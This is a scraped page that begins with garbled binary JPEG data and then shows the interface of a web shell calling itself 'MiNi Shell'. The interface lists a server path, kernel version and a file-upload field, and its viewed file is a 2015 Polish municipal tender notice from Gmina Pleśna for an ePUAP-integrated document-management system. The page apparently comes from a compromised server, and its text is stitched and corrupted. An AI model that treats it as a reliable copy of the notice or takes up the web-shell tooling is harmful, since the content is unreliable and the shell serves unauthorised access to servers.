JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150410/80714-N-2015.html

<p class="kh_header"><b>Pleśna: Budowa systemu do elektronicznego zarządzania dokumentami z funkcjonalnością wymiany korespondencji z platformą ePUAP w 2 Gminach Pleśna i Zakliczyn</b><br>
<b>Numer ogłoszenia: 80714 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pleśna , Pleśna 240, 33-171 Pleśna, woj. małopolskie, tel. 014 6798170, faks 014 6798947.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plesna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa systemu do elektronicznego zarządzania dokumentami z funkcjonalnością wymiany korespondencji z platformą ePUAP w 2 Gminach Pleśna i Zakliczyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa systemu do elektronicznego zarządzania dokumentami z funkcjonalnością wymiany korespondencji z platformą ePUAP w dwóch Gminach: Urząd Gminy Pleśna, 33-171 Pleśna 240  oraz  Urzędu Miejskiego w Zakliczynie, 32-840 Zakliczyn, Rynek 32. Szczegółowy opis przedmiotu zamówienia dla ww. Urzędów stanowi załącznik nr9 do SIWZ.
 Wspólny Słownik Zamówień CPV
48311100-2 System zarządzania dokumentacją
48612000-1 System zarządzania bazą danych
72263000- 6 Usługi wdrażania oprogramowania 
72265000- 0 Usługi konfiguracji oprogramowania
80511000- 9 Usługi szkolenia personelu
80533100-0 Usługi szkolenia komputerowego
72212312-9 Usługi opracowywania oprogramowania do publikowania elektronicznego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.31.11.00-2, 48.61.20.00-1, 72.26.30.00-6, 72.26.50.00-0, 80.51.10.00-9, 80.53.31.00-0, 72.21.23.12-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia określonego w punkcie VIII.1.1).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się od Wykonawcy wykazania wykonania 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał, a w przypadku świadczeń ciągłych lub okresowych wykonuje w jednostkach administracji samorządowej: 
co najmniej dwa zamówienia, każde polegające na dostawie, instalacji, wdrożeniu, konfiguracji oraz przeszkoleniu użytkowników (w tym przeprowadzeniu szkoleń 
i instruktarzy przystanowiskowych) oferowanego w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP, w tym każde z wykazanych zamówień musiało obejmować wykonanie i uruchomienie integracji Systemu Elektronicznego Obiegu Dokumentów z użytkowanym przez Zamawiającego - tj. Urząd Gminy Pleśna - systemem do obsługi BIP w zakresie automatycznej prezentacji na stronie podmiotowej BIP co najmniej statusu spraw i rejestrów prowadzonych w Systemie Elektronicznego Obiegu Dokumentów o wartości zamówień nie mniejszej niż 70 000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych brutto) każde,- wg zał. Nr 4 do SIWZ.
Potwierdzeniem spełniania warunku będzie:
a)	złożenie oświadczenia określonego w punkcie VIII.1.1)
b)	złożenie dokumentu określonego w punkcie VIII.1.2)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia określonego w punkcie VIII.1.1).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby wykonawca dysponował co najmniej dysponuje odpowiednią kadrą (Zamawiający nie wyraża zgody na łączenie którejkolwiek z ról) przeznaczoną do realizacji zamówienia spełniającą poniższe warunki: 
a)co najmniej 1 osoba przewidziana do roli Kierownika Projektu, posiadająca wykształcenie wyższe oraz minimum 5 letnie doświadczenie w zarządzaniu realizacją projektów informatycznych wg metodyki Prince2 lub innej równoważnej, potwierdzone udziałem proponowanego specjalisty na stanowisku Kierownika Projektu lub równoważnym w przynajmniej 5 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach informatycznych polegających na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej oferowanego przez Wykonawcę w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP 
oraz użytkowanym przez Zamawiającego systemem do obsługi BIP o wartości nie mniejszej niż 70 000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych brutto) każde oraz posiadająca znajomość najlepszych praktyk w zakresie zarządzania projektami - posiadającą certyfikat potwierdzający posiadaną wiedzę z zakresu metodyki zarządzania projektami Prince2 lub innej równoważnej, co najmniej na poziomie wyższym niż podstawowy;
b)co najmniej 1 osoba przewidziana do roli Zastępcy Kierownika Projektu, posiadająca wykształcenie wyższe oraz minimum 3 letnie doświadczenie w zarządzaniu realizacją projektów informatycznych, potwierdzone udziałem proponowanego specjalisty na stanowisku Kierownika Projektu lub Zastępcy Kierownika Projektu w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach informatycznych polegających na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej oferowanego przez Wykonawcę w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP oraz użytkowanym przez Zamawiającego systemem do obsługi BIP o wartości nie mniejszej niż 70 000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych brutto) każde;
c)co najmniej 3 osoby, przewidziane do roli Specjalisty ds. Wdrożenia Systemu Elektronicznego Obiegu Dokumentów, posiadające wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w zakresie wdrażania w jednostkach administracji samorządowej oferowanego w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP oraz użytkowanym przez Zamawiającego systemem do obsługi BIP. Każdy z proponowanych specjalistów, musi posiadać doświadczenie na stanowisku wdrożeniowca Systemu Elektronicznego Obiegu Dokumentów, potwierdzone udziałem proponowanych specjalistów na stanowisku wdrożeniowca Systemu Elektronicznego Obiegu Dokumentów (EOD), w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na wdrożeniu w jednostce administracji samorządowej oferowanego w niniejszym postępowaniu przez Wykonawcę Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP oraz użytkowanym przez Zamawiającego systemem do obsługi BIP o wartości nie mniejszej niż 70 000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych brutto) każde, a proponowani specjaliści musieli w nich wykonywać istotne zadanie merytoryczne. 
d)co najmniej 1 osoba, przewidziana do roli Certyfikowanego Testera, posiadająca wykształcenie wyższe techniczne lub wyższe wykształcenie w zakresie nauk ścisłych w rozumieniu rozporządzenia Ministra Nauki i Szkolnictwa Wyższego  z dnia 8 sierpnia 2011 r. w sprawie obszarów wiedzy, dziedzin nauki i sztuki oraz dyscyplin naukowych i artystycznych  (Dz. U. z 2011 r., Nr 179, poz. 1065), oraz minimum 3 letnie doświadczenie zawodowe w zakresie testowania oferowanego przez Wykonawcę w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów, potwierdzone udziałem proponowanego specjalisty na stanowisku Testera w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach informatycznych polegających na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej oferowanego przez Wykonawcę w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP oraz użytkowanym przez Zamawiającego systemem do obsługi BIP, o wartości nie mniejszej niż 70 000,00 zł brutto (słownie: osiemdziesiąt tysięcy złotych brutto) każde oraz posiadająca znajomość najlepszych praktyk w zakresie testowania systemów informatycznych potwierdzoną certyfikatem potwierdzającym posiadaną wiedzę z zakresu testowania systemów informatycznych ISTQB na poziomie co najmniej podstawowym lub innym równoważnym.
e)co najmniej 1 osoba, przewidziana do roli Administratora Technicznego, posiadająca wykształcenie wyższe techniczne lub wyższe wykształcenie 
w zakresie nauk ścisłych w rozumieniu rozporządzenia Ministra Nauki 
i Szkolnictwa Wyższego  z dnia 8 sierpnia 2011 r. w sprawie obszarów wiedzy, dziedzin nauki i sztuki oraz dyscyplin naukowych i artystycznych  (Dz. U. z 2011 r., Nr 179, poz. 1065), oraz minimum 3 letnie doświadczenie zawodowe w zakresie administrowania technicznego oferowanego przez Wykonawcę w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów, potwierdzone udziałem proponowanego specjalisty na stanowisku Administratora Technicznego w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach informatycznych polegających na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej oferowanego przez Wykonawcę 
w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP oraz użytkowanym przez Zamawiającego systemem do obsługi BIP, o wartości nie mniejszej niż 70 000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych brutto) każde.
f)co najmniej 1 osoba przewidziana do roli Specjalisty ds. Informacji Niejawnych, posiadająca wykształcenie wyższe techniczne lub wyższe wykształcenie 
w zakresie nauk ścisłych w rozumieniu rozporządzenia Ministra Nauki 
i Szkolnictwa Wyższego z dnia 8 sierpnia 2011 r. w sprawie obszarów wiedzy, dziedzin nauki i sztuki oraz dyscyplin naukowych i artystycznych  (Dz. U. z 2011 r., Nr 179, poz. 1065), oraz minimum 3 letnie doświadczenie w zakresie zarządzania informacjami niejawnymi przy wdrażaniu oferowanego przez Wykonawcę 
w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów, potwierdzone udziałem proponowanego specjalisty na stanowisku Specjalisty ds. Informacji Niejawnych w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach informatycznych polegających na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej oferowanego przez Wykonawcę w niniejszym postępowaniu Systemu Elektronicznego Obiegu Dokumentów zintegrowanego z platformą ePUAP oraz użytkowanym przez Zamawiającego systemem do obsługi BIP, o wartości nie mniejszej niż 70 000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych brutto) każde oraz posiadająca aktualne poświadczenie bezpieczeństwa w zakresie dostępu do informacji niejawnych oznaczone klauzulą co najmniej poufne.
Potwierdzeniem spełniania warunku będzie:
a)złożenie oświadczenia określonego w punkcie VIII.1.1)
b)złożenie dokumentu określonego w punkcie VIII.1.3)
c)złożenie oświadczenia określonego w punkcie VIII.1.4)
W przypadku, gdy Wykonawca w przetargu (niezależnie od charakteru prawnego łączących go stosunków z innymi podmiotami) polega na zasobach innych podmiotów - osobach zdolnych do wykonania zamówienia zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji osób, na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia określonego w punkcie VIII.1.1).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Sporządzony wg Załącznika nr 1 do SIWZ formularz oferty.
2)	Dokumenty i oświadczenia - pkt. VIII ust. 1 pkt 1) - 4) i ust. 2 pkt 1) - 3).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany postanowień zawartej umowy wymaga formy pisemnej  w postaci aneksu pod rygorem nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ustawy Prawo zamówień publicznych. Wzór umowy stanowi załącznik nr 8 do SIWZ.
2.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy, w zakresie przesunięcia terminu wykonania robót w przypadku: Wszelkie zmiany i uzupełnienia do umowy wymagają aneksu w formie pisemnej pod rygorem nieważności, podpisanego przez obie strony umowy.
1.	W przypadku, gdy sprzęt przedstawiony w ofercie w momencie dostawy:
	nie będzie dostępny na rynku,
	będzie wycofany ze sprzedaży przez producenta,
	producent wprowadzi nowszy model zastępujący dotychczasowy model.
Zamawiający dopuści sprzęt równoważny lub o lepszych parametrach.
W przypadku gdy zaoferowany system będzie w nowszej, odmiennej wersji w chwili odbioru systemu niż w chwili składania oferty Zamawiający dopuści zmiany zawarte w systemie na dzień odbioru systemu.  
3.Zmiana terminu umownego może także wynikać z działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności (np. przeszkody atmosferycznej o charakterze katastrof) nieprzewidywalnej w chwili zawarcia umowy. Nie uważa się za czynnik siły wyższej takiej okoliczności, która przy składaniu ofert musi być normalnie brana pod uwagę.
4.Wprowadzenie powyższych zmian jest możliwe po spełnieniu następujących warunków:
a.	zgodnego oświadczenia stron umowy,
b.	zachowania formy pisemnej,
c.	niezmienności wynagrodzenia Wykonawcy wynikającego z niniejszej umowy.

5.W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania  jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.plesna.pl/przetargi.htm lub http://bip.malopolska.pl/ugplesna/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pleśna, 33-171 Pleśna 240, pok. nr14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2015 godzina 10:00, miejsce: Oferty należy składać w Urzędzie Gminy w Pleśnej 33-171 Pleśna 240, pok. 9 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach projektu pn. Wdrażanie standardów świadczenia elektronicznych usług publicznych - ePUAP w gminie: Wierzchosławice, Pleśna, Radłów, Szczurowa, Zakliczyn nr projektu POKL. 05.02.01-00-54/2013, współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com